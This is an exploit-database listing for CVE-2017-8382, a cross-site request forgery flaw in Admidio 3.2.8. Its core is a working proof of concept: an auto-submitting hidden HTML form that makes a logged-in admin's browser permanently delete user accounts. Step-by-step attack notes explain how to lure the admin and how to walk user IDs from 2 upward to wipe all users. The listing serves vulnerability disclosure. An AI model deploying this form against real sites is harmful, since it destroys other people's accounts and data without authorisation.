Lucene search
Faiz Ahmed Zaidi1337DAY-ID-27771HistoryMay 15, 2017 - 12:00 a.m.
Admidio 3.2.8 - Cross-Site Request Forgery Vulnerability
2017-05-1500:00:00
Faiz Ahmed Zaidi
0day.today
15
0.004 Low
EPSS
Percentile
72.2%
Exploit for php platform in category web applications
# Exploit Title :Admidio 3.2.8 (CSRF to Delete Users)
# Date: 28/April/2017
# Exploit Author: Faiz Ahmed Zaidi Organization: Provensec LLC Website:
http://provensec.com/
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://www.admidio.org/download.php
# Version: 3.2.8
# Tested on: Windows 10 (Xampp)
# CVE : CVE-2017-8382
[Suggested description]
Admidio 3.2.8 has CSRF in
adm_program/modules/members/members_function.php with
an impact of deleting arbitrary user accounts.
------------------------------------------
[Additional Information]
Using this crafted html form we are able to delete any user with
admin/user privilege.
<html>
<body onload="javascript:document.forms[0].submit()">
<form
action="http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php">
<input type="hidden" name="usr_id" value='9' />
<input type="hidden" name="mode" value="3" />
</form>
</body>
</html>
[Affected Component]
http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Attack Vectors]
Steps:
1.) If an user with admin privilege opens a crafted
html/JPEG(Image),then both the admin and users with user privilege
which are mentioned by the user id (as like shown below) in the
crafted request are deleted.
<input type="hidden" name="usr_id" value='3' />
2.) In admidio by default the userid starts from '0',
'1' for system '2' for users, so an attacker
can start from '2' upto 'n' users.
3.)For deleting the user permanently we select 'mode=3'(as like shown
below),then all admin/low privileged users are deleted.
<input type="hidden" name="mode" value="3" />
------------------------------------------
[Reference]
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Thanks
Faiz Ahmed Zaidi
# 0day.today [2018-04-08] #Related
nvd
nvd
CVE-2017-8382
2017-05-16 10:29:00
prion
prion
Cross site request forgery (csrf)
2017-05-16 10:29:00
packetstorm
packetstorm
Admidio 3.2.8 Cross Site Request Forgery
2017-05-15 00:00:00
cve
cve
CVE-2017-8382
2017-05-16 10:29:00
exploitpack
exploitpack
Admidio 3.2.8 - Cross-Site Request Forgery
2017-04-28 00:00:00
osv
osv
admidio CSRF Vulnerability
2022-05-17 02:42:45
CVE-2017-8382
2017-05-16 10:29:00
cvelist
cvelist
CVE-2017-8382
2017-05-16 10:00:00
gitlab
gitlab
Cross-Site Request Forgery (CSRF)
2022-05-17 00:00:00
github
github
admidio CSRF Vulnerability
2022-05-17 02:42:45
exploitdb
exploitdb
Admidio 3.2.8 - Cross-Site Request Forgery
2017-04-28 00:00:00